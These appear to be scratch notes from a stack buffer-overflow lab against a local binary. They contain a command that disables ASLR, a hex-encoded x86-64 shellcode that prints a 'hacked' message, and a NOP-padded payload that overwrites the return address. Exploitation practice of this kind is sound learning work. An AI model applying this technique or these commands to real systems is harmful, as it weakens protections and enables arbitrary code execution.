segmentation fault at 34
saved rip: 0x32ef81ed1d
rip at: 0x7fffffffdfd8

24 + address want in rip

echo 0 > /proc/sys/kernel/randomize_va_space. 

export HACK="$(python -c 'print "\xeb\x29\x48\x31\xdb\xb3\x0e\x5a\x48\x89\xd6\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xd2\xb2\x15\x0f\x05\xfe\xcb\x75\xea\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05\xe8\xd2\xff\xff\xff\x59\x6f\x75\x27\x76\x65\x5f\x62\x65\x65\x6e\x5f\x68\x61\x63\x6b\x65\x64\x21\x0a\x0d"')"

./1a "$(python -c 'print "\x90" * 24 + "\xfa\x1e\xb5\x8a\xfc\x7f\x00\x00"')"
